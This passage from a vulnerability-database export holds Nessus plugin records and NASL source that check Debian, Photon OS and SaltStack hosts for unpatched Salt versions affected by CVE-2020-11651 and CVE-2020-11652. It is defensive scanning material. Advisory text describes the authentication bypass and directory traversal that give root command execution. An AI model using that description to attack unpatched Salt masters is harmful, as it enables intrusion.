value:\"https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/salt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"salt-cloud\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-common\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-doc\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-master\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-minion\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-ssh\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-syndic\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:09", "description": "An update of the salt package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Salt PHSA-2020-1.0-0294", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2020-1_0-0294_SALT.NASL", "href": "https://www.tenable.com/plugins/nessus/136694", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0294. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136694);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Photon OS 1.0: Salt PHSA-2020-1.0-0294\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-294.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-api-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-cloud-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-master-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-minion-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-proxy-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-spm-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-ssh-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-syndic-2019.2.4-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:30", "description": "An update of the salt3 package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "Photon OS 3.0: Salt3 PHSA-2020-3.0-0091", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2020-3_0-0091_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/136699", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-3.0-0091. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136699);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Photon OS 3.0: Salt3 PHSA-2020-3.0-0091\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-91.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 3.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-api-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-cloud-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-master-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-minion-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-proxy-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-spm-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-ssh-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-syndic-2019.2.4-1.ph3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:12:37", "description": "An update of the salt3 package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Salt3 PHSA-2020-1.0-0294", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2020-1_0-0294_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/136695", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0294. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136695);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Photon OS 1.0: Salt3 PHSA-2020-1.0-0294\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-294.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-api-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-cloud-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-master-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-minion-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-proxy-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-spm-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-ssh-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-syndic-2019.2.4-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:27", "description": "According to its self-reported version number, the instance of SaltStack hosted on the remote server is prior to 2019.2.4, 3000.x prior to 3000.2. It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerabilities exists in the ClearFuncs class due to improper validation of method calls. An unauthenticated, remote attacker can exploit this by accessing exposed methods to trigger minions to run arbitrary commands as root, or to retrieve the root key to authenticate commands from the local root user on the master server. (CVE-2020-11651)\n\n - A directory traversal vulnerabilities exists in the ClearFuncs class due to improper path sanitization. An authenticated, remote attacker can exploit this by accessing the exposed get_token() method which allows the insertion of double periods in the filename parameter to read files outside of the intended directory.\n The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().\n (CVE-2020-11652)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "nessus", "title": "SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:saltstack:salt"], "id": "SALTSTACK_3000_2_MULTIPLE_VULNERABILITIES.NASL", "href": "https://www.tenable.com/plugins/nessus/136402", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136402);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"EDB-ID\", value:\"48421\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of SaltStack running on the remote server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of SaltStack hosted on the remote server is prior to\n2019.2.4, 3000.x prior to 3000.2. It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerabilities exists in the ClearFuncs class due to improper validation of\n method calls. An unauthenticated, remote attacker can exploit this by accessing exposed methods to trigger\n minions to run arbitrary commands as root, or to retrieve the root key to authenticate commands from the\n local root user on the master server. (CVE-2020-11651)\n\n - A directory traversal vulnerabilities exists in the ClearFuncs class due to improper path sanitization. An\n authenticated, remote attacker can exploit this by accessing the exposed get_token() method which allows\n the insertion of double periods in the filename parameter to read files outside of the intended directory.\n The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().\n (CVE-2020-11652)\");\n # https://labs.f-secure.com/advisories/saltstack-authorization-bypass\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4df67f57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to SaltStack version 2019.2.4, 3000.2 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n 